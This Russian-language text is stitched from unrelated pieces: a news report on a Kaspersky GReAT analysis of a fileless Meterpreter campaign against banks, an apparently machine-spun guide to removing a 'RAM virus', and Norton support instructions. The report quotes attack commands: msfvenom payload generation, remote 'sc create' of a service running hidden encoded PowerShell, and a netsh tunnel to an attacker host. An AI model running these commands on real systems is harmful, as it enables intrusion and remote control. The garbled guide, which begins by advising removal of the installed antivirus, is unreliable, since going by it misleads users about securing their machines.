о новой, интересной вредоносной кампании, от которой пострадали банки, телекомы, правительственные агентства, а также другие компании и организации более чем в сорока странах мира.
Аналитики команды GReAT пишут, что первыми угрозу заметили специалисты банковской команды безопасности: тогда в физической памяти контроллера домена был найден код Meterpreter . Продукты «Лаборатории Касперского» распознают такие проблемы как MEM:Trojan.Win32.Cometer и MEM:Trojan.Win32.Metasploit. Когда аналитики стали разбираться, пытаясь понять, откуда в памяти взялся код, они также обнаружили PowerShell-скрипты в реестре Windows, и утилиту NETSH, которая использовалась для туннелирования трафика на управляющий сервер атакующих.
Такие атаки называются «безфайловыми» (fileless), то есть вредонос не размещает никаких файлов на жестком диске, вместо этого пейлоад внедряется непосредственно в память и существует внутри RAM. Разумеется, обнаружить и отследить такую атаку крайне трудно.
Схема атаки
Исследователи объясняют, что широко известный фреймворк Metasploit может использоваться для создания скриптов, как на примере ниже.
Подобные скрипты помогают осуществить инъекцию Meterpreter в RAM. Для их генерации может использоваться Msfvenom из состава Metasploit:
Msfvenom -p windows/meterpreter/bind_hidden_tcp AHOST=10.10.1.11 -f psh-cmd
Когда скрипт сгенерирован, атакующие используют Windows SC для установки вредоносного сервиса на целевой хост (в итоге будет выполнен вышеприведенный скрипт). Это можно провернуть, к примеру, при помощь такой команды:
sc \\target_name create ATITscUA binpath= “C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden e aQBmACgAWwBJAG4AdABQAHQA…” start= manual
Следующий шаг – настройка туннелирования, чтобы зараженная машина стала доступна удаленному хосту. Для этого злоумышленники прибегают к такой команде:
netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.10.1.12 connectport=8080 listenaddress=0.0.0.0
В результате весь сетевой трафик с 10.10.1.11:4444 будет перенаправлен на 10.10.1.12:8080. Данная техника позволяет установить прокси-тоннель, с помощью которого преступники смогут удаленно контролировать зараженный PowerShell хост.
Аналитики отмечают, что использование SC и NETSH требует привилегий администратора на локальном и удаленном хосте. Использование вредоносных PowerShell-скриптов тоже потребует эскалации привилегий и изменений в execution policy. Для этого злоумышленники прибегают к помощи дампера учетных данных Mimikatz , собирая пароли от аккаунтов на локальной машине и окружающих рабочих станциях.
Внимательно изучив атаку на один из пострадавших банков, исследователи пришли к выводу, что операторы этой кампании использовали домены третьего уровня, а также домены в зонах.GA, .ML, .CF. Дело в том, что такие домены бесплатны, а значит, злоумышленники не оставляют после себя WHOIS-информации.
Суммируя все перечисленное (использование Metasploit и стандартных утилит Windows, домены без WHOIS-информации), исследователи делают вывод, что почерк неизвестных злоумышленников очень похож на работу таких групп, как GCMAN и Carbanak . Никаких прямых улик, тем не менее, нет, так что связать эти тихие атаки с какой-либо конкретной группировкой не представляется возможным.
«Техники, подобные описанным в этом отчете, становятся все более распространенными, особенно [когда атаки осуществляются] против крупных целей в банковской индустрии. К сожалению, использование простых инструментов, в сочетании с различными уловками, делают обнаружение [таких атак] крайне сложным», - резюмируют эксперты GReAT.
Вирус в оперативной памяти, это явление достаточно неприятное и к сожалению не редкое. очень часто мы видим срытый файл но никак не можем его удалить - он все появляется и появляется, либо сама операционная система Виндовс не дает это сделать.
Кстати значительно чаще проявляется в случаях неправильной настройки антивируса либо отсутствия оного. В случае если у вас такая обстановка, то рекомендую вам ознакомится с статьей - установка и настройка антивируса на Windows. Перед тем как, удалить вирус из оперативной памяти, стоит разобраться, что происходит с противовирусной программой, установленной на вашем компьютере. Скорее всего, вашу противовирусную программу, «развалил», показавшийся вирус.Возможно и такое, что в сигнатурном арсенале вашей противовирусной программы не имеется метода, чтобы вполне стереть вирус из своевременной совокупности и программа принимает попытки всего лишь удалить вирусное заражение, а не сам вирус.
Частенько случаются обстановке, когда вирус передаёт программы и дополнительные файлы для собственной работы либо же машинально начинает работу, а сейчас противовирусная программа выявит эти копии, но не выявит сам исходник (вирус), и в большинстве случаев не может с ним совладать.
- Удаляем (при помощи деинсталлятора - установка/удаление программ) установленную противовирусную программу, она тут ни к чему.
- Скачиваем из интернета Ccleaner и устанавливаем ее. Начинаем работу, для начала очищаем папки temp. Это ПО подходит простым пользователям, исходя из этого возможно ставить все флажки в настройках- пользовательскую данные она не сотрет! Подробней о программе я писал в статье - чистка реестра.
- Потом нам на помощь пригодится утилита для очистки вирусов. О них я писал в статье - бесплатные утилиты для удаления вирусов. Выбираем любую. К примеру скачиваем из интернета программу Dr.web Cure it и устанавливаем ее.
- Ставим обновление, запускаем одно из двух сканирований(стремительное либо полное). Стремительное сканирование дает в принципе действенный результат. Все вирусы, которые были обнаружены — удаляем. Перезагружаем компьютер.
- Скачиваем новый антивирус. Принципиально важно! В случае если до неприятности, у Вас был установлена противовирусная Eset NOD32 antivirus, то тогда, ставим Avast либо Avira, в случае если был установлен Avast ставим Eset, либо любую другую программу антивируса на ваш вкус.
- Растолковать такие действия достаточно легко, противовирусная программа, которая у Вас была скорее всего, была повреждёна, данные в реестре имели возможность остаться, а это что приведёт к неточной работе противовирусной программы, тем более, что именно эта противовирусная программа не нашла угрозу из интернета на вашем компьютере.
При обнаружении Norton угрозы программа автоматически удаляет ее, за исключением случаев, когда ваше вмешательство необходимо для определения способа обработки угрозы. В таких случаях Norton отображает уведомление «Обнаружены угрозы» или «Угроза безопасности» с доступными вариантами реакции на угрозу.
Просмотр угроз, которые были автоматически устранены во время сканирования
Запустите Norton.
Безопасность устройства , нажмите Открыть .
В окне Журнал безопасности Устраненные угрозы безопасности .
Выберите угрозу в списке и просмотрите выполненные действия на панели Сведения .
В некоторых случаях вместо автоматического устранения угрозы Norton рекомендует вам выполнить определенное действие для ее устранения.
Исправление угроз, которые не были устранены во время сканирования
Запустите Norton.
Если отображается окно Мой Norton рядом с разделом Безопасность устройства , нажмите Открыть .
В главном окне Norton дважды щелкните Безопасность , а затем выберите Журнал .
В окне Журнал безопасности в списке Показать выберите пункт Неустраненные угрозы безопасности .
Если список содержит неустраненные угрозы, выберите интересующую вас угрозу.
Если есть основания полагать, что система заражена, запустите Norton Power Eraser. Norton Power Eraser - это мощное средство удаления вредоносных программ, позволяющее избавиться от наиболее устойчивых к удалению угроз безопасности. Дополнительную информацию см. в документе Запуск сканирования Norton для обнаружения угроз на ПК
Norton Power Eraser - это средство удаления вредоносных программ, работающее в агрессивном режиме. Иногда вместе с вредоносными программами средство Norton Power Eraser может удалить благонадежные файлы, поэтому внимательно просмотрите результаты сканирования, прежде чем удалять какие-либо файлы.
По умолчанию Norton удаляет угрозы безопасности с компьютера и помещает их в карантин. Если есть основания полагать, что файл был удален по ошибке, то его можно восстановить из карантина в исходном расположении и исключить из последующих операций сканирования.
Восстановление файла из карантина
Запустите Norton.
Если отображается окно Мой Norton рядом с разделом Безопасность устройства , нажмите Открыть .
В главном окне Norton щелкните Безопасность , а затем выберите Журнал .
В окне Журнал безопасности раскройте меню Показать и выберите вариант Карантин .
Выберите файл, который необходимо восстановить.
На панели Сведения щелкните Параметры .
В окне Обнаружена угроза выберите команду Восстановить и исключить этот файл .
В окне Восстановление из карантина нажмите кнопку Да .
В окне Найти папку выберите папку или диск для размещения восстановленного файла и нажмите кнопку ОК .
